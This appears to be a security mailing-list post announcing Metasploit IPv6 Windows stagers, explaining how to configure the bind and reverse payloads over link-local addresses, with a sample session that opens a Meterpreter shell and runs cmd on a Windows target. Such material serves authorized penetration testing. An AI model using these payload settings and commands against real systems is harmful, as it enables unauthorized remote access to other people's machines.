Microsoft Windows IPv6 Stagers

[hdm at metasploit.com (H D Moore)]

I added two new IPv6 Windows stagers tonight, these work with the shell, 
meterpreter, vncinject, and other common stages over the IPv6 protocol. 
Unfortunately, I don't have time to really document it tonight, but I 
wrote up a quick summary of how to use them:

To use the new payloads, set the PAYLOAD to one of the reverse_ipv6_tcp or 
bind_ipv6_tcp payload options after updating via SVN.

For the reverse_ipv6_tcp payload, you need to specify LPORT and LHOST. 
LPORT works like normal, but LHOST must be your own valid IPv6 address. 
If you are using link-local addresses (fe80::*), there is a snag, for the 
reverse payload to work, you must tell the target which interface to use 
to connect back on. This is accomplished by setting the SCOPEID variable 
to match the number after the "%" in the IPv6 address in Windows. You can 
see your IPv6 link-local address in Windows via "ipconfig". For example, 
if ipconfig on the target shows "fe80::48d9:700b:a573:39a3%19", then set 
the SCOPEID to 19. If you are not using link-local addresses, this isn't 
an issue (SCOPEID of 0 should always work).

For the bind_ipv6_tcp payload, you need to specify LPORT like normal, but 
there are some hoops for the RHOST. In the case of the bind payloads, 
RHOST tells the handler which address to connect to. Once again, 
link-local addresses make this tricky. When using a Linux machine as the 
Metasploit source, you need to append "%<interface>" after the RHOST IPv6 
address of the target. Replace "interface" with the name of the local 
Linux interface for the network connecting you to the target. For 
example, if we are attacking "fe80::48d9:700b:a573:39a3", and I am 
connected via "eth0" to the network where this host resides, I would 
specify RHOST as "fe80::48d9:700b:a573:39a3%eth0". 

To summarize -- if you have a Linux machine and are attacking Windows and 
both machines have IPv6 enabled (default for most Linux distros, default 
for all newer Windows versions), then you can use Metasploit to launch 
attacks over IPv6. If you are using real IPv6 addresses, this is much 
easier, since you shouldn't have to care about the scope_id. If you are 
attacking FROM Windows, this won't work, because the stock version of 
Ruby for Win32 doesn't support IPv6. If you are attacking from Mac OS X 
or some BSD variant, it might work, it might not, drop me an email and 
let me know.

Enjoy pwning the "new" internet,

-HD

-- sample exploit run (using handler) --


msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
PAYLOAD => windows/meterpreter/bind_ipv6_tcp

msf exploit(handler) > set LPORT 12345
LPORT => 12345

msf exploit(handler) > set RHOST fe80::5569:1438:c2c2:722e%eth0
RHOST => fe80::5569:1438:c2c2:722e%eth0

msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (fe80::21b:63ff:fe98:bf36%eth0:37510 -> 
fe80::5569:1438:c2c2:722e%eth0:12345)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: BOOM\hdm
meterpreter > sysinfo
Computer: BOOM
OS      : Windows 2000 (Build 6001, Service Pack 1).
meterpreter > execute -f cmd -i
Process 4868 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\shared>netstat -na
netstat -na

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
  [ snip ]
  TCP    [fe80::5569:1438:c2c2:722e%9]:12345  
[fe80::21b:63ff:fe98:bf36%9]:37510  ESTABLISHED